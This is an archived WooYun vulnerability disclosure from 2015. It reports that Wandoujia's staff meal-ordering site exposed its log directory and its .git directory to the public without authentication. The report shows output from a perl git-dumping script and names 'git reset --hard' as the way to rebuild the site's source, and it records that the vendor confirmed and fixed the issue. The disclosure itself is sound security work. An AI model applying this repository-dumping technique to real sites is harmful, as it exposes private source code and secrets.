乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-02-10: 细节已通知厂商并且等待厂商处理中 2015-02-10: 厂商已经确认,细节仅向厂商公开 2015-02-18: 厂商已经修复漏洞并主动公开,细节向公众公开
配置不当未授权访问
站点:fan.wandoulabs.com是豌豆荚员工点餐的平台(应该算是内部平台吧,怎么会公网可以访问呢?)
#1.log目录未授权访问http://fan.wandoulabs.com/log
http://fan.wandoulabs.com/api/rankhttp://fan.wandoulabs.com/api/data/%E8%B5%9B%E7%99%BE%E5%91%B3%28%E8%A5%BF%E5%B0%8F%E5%8F%A3%29
访问得里面有Unicode编码数据解码可以知道午餐有:雪梨银耳百合粥、香滑蒸蛋等等,伙食不错的!#2.git代码托管服务配置不当
http://uowechat.wandoujia.com/.git/config
上面的链接可以未授权访问,表示整个git服务的源代码都可以被遍历获取拿出perl脚本自动化遍历可得:
D:\>perl 1.pl -v -u http://fan.wandoulabs.com/.git[i] Downloading git files from http://fan.wandoulabs.com/.git[!] Not found for COMMIT_EDITMSG: 404 Not Found[d] found config[d] found description[d] found HEAD[d] found index[d] found packed-refs[!] Not found for objects/info/alternates: 404 Not Found[!] Not found for info/grafts: 404 Not Found[d] found logs/HEAD[!] Not found for objects/22/c454f74f434bc3303c5538825b5528adb10f36: 404 Not Found[d] found objects/6f/858fe11be5607433e63f2ca91b39089ac3940e[d] found objects/16/55132c58f76fa46457ce4987c65de2051b2539[d] found objects/50/3563d459e2ba0d5ef7b74b2b9555a20cef408b[d] found objects/44/cdfce8beb9129c0986b6903000cedf07b70297[d] found objects/da/92170fdf2a71d6a40453d71763ce23218088dc[d] found objects/d2/02abe5e479b5bad632ceef0b8e1b3ca7f5b83e[d] found objects/81/9a3ce8b2df290cacda94d2ca0467d6c4c568ed[d] found objects/5f/c5c945f29951813c669cf6f358a28d8dadb888[d] found objects/bc/2597a3cd290668ae39c15b96d6e50ffdb02358[d] found objects/29/885214c8a90a7a75bfbac743d8ee9e9b944d52[d] found objects/44/6bd616618caffb2248c4fefbd3c221c2c33c4c[d] found objects/0a/ee1372e64dff6cfc61e57075d19869c6f730d3[d] found objects/ab/f8acb45ed99e5c695db70c3710dce8eb65b8b3[d] found objects/83/11801845758c1e01b40b8979489d194ebd28f7[d] found objects/78/3d646e3c583b9cdbec38fc4b08473a9a9e4668[d] found objects/64/a78a2bdc0f16d3638218822976c6f2f4857a12[d] found objects/e7/f62e4cae87091ca6619573ff3c5bbec545e7a6[d] found objects/57/06af10f2a2d4505571a696cee5cfa805c90e08[d] found objects/ca/be86f69713ca678f55e0a8672a0243ee702b15[d] found objects/44/b7ab3bab31d40485fe67d295c1496033d76c21[d] found refs/heads/master[i] Running git fsck to check for missing items
~!1./refs/heads/master:
~!2./logs/HEAD
~!3.objects/44/b7ab3bab31d40485fe67d295c1496033d76c21其他不一一证明了.利用方式:
git reset --hard
还原整站
网站合理配置
危害等级:中
漏洞Rank:10
确认时间:2015-02-10 10:31
和上个漏洞一起处理了,感谢对豌豆荚安全的帮助
2015-02-18:已修复。